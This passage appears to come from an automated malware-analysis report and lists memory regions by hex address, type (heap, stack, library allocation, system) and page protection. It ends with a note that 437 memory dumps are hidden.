page read and write
|
||
|
1EA26D31000
|
heap
|
page read and write
|
||
|
6BAE000
|
stack
|
page read and write
|
||
|
1EA23545000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
1EA23535000
|
heap
|
page read and write
|
||
|
3034000
|
heap
|
page read and write
|
||
|
86289FC000
|
stack
|
page read and write
|
||
|
7874000
|
heap
|
page read and write
|
||
|
4B91000
|
trusted library allocation
|
page read and write
|
||
|
5B71000
|
trusted library allocation
|
page read and write
|
||
|
2D6C000
|
heap
|
page read and write
|
||
|
319E000
|
heap
|
page read and write
|
||
|
4B71000
|
trusted library allocation
|
page read and write
|
||
|
B2F000
|
stack
|
page read and write
|
||
|
787A000
|
heap
|
page read and write
|
||
|
35E4000
|
heap
|
page read and write
|
||
|
4C32000
|
trusted library allocation
|
page read and write
|
||
|
1EA23537000
|
heap
|
page read and write
|
||
|
2D40000
|
trusted library allocation
|
page read and write
|
||
|
3310000
|
trusted library allocation
|
page read and write
|
||
|
7291000
|
heap
|
page read and write
|
||
|
2D67000
|
trusted library allocation
|
page execute and read and write
|
||
|
50FF000
|
trusted library allocation
|
page read and write
|
||
|
1EA25554000
|
heap
|
page read and write
|
||
|
30DF000
|
stack
|
page read and write
|
||
|
5BDA000
|
trusted library allocation
|
page read and write
|
||
|
1EA2356F000
|
heap
|
page read and write
|
||
|
72CE000
|
stack
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page read and write
|
||
|
4F50000
|
heap
|
page execute and read and write
|
||
|
8628AFF000
|
stack
|
page read and write
|
||
|
4BE2000
|
trusted library allocation
|
page read and write
|
||
|
300C000
|
heap
|
page read and write
|
||
|
787E000
|
heap
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
C84000
|
heap
|
page read and write
|
||
|
1EA24E90000
|
heap
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA23561000
|
heap
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
1EA25658000
|
heap
|
page read and write
|
||
|
6069000
|
trusted library allocation
|
page read and write
|
||
|
329C000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
1EA26DB7000
|
heap
|
page read and write
|
||
|
1EA26D39000
|
heap
|
page read and write
|
||
|
AEE000
|
stack
|
page read and write
|
||
|
3194000
|
heap
|
page read and write
|
||
|
3350000
|
trusted library allocation
|
page execute and read and write
|
||
|
6009000
|
trusted library allocation
|
page read and write
|
||
|
1EA25F0E000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
6DBE000
|
stack
|
page read and write
|
||
|
3239000
|
stack
|
page read and write
|
||
|
2EBC000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
35E2000
|
heap
|
page read and write
|
||
|
1EA25FE0000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
1EA26D4D000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
76AE000
|
stack
|
page read and write
|
||
|
3760000
|
heap
|
page read and write
|
||
|
50D2000
|
trusted library allocation
|
page read and write
|
||
|
CC4000
|
trusted library allocation
|
page read and write
|
||
|
5010000
|
heap
|
page read and write
|
||
|
1EA25320000
|
heap
|
page read and write
|
||
|
70BF000
|
stack
|
page read and write
|
||
|
1EA26E30000
|
heap
|
page read and write
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA25554000
|
heap
|
page read and write
|
||
|
4A6E000
|
stack
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
53B4000
|
trusted library allocation
|
page read and write
|
||
|
77F0000
|
heap
|
page execute and read and write
|
||
|
49F4000
|
heap
|
page read and write
|
||
|
1EA23537000
|
heap
|
page read and write
|
||
|
1EA25551000
|
heap
|
page read and write
|
||
|
CB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA23579000
|
heap
|
page read and write
|
||
|
86284FE000
|
stack
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
728F000
|
stack
|
page read and write
|
||
|
3764000
|
heap
|
page read and write
|
||
|
1EA23569000
|
heap
|
page read and write
|
||
|
1EA23571000
|
heap
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
3197000
|
heap
|
page read and write
|
There are 437 hidden memdumps, click here to show them.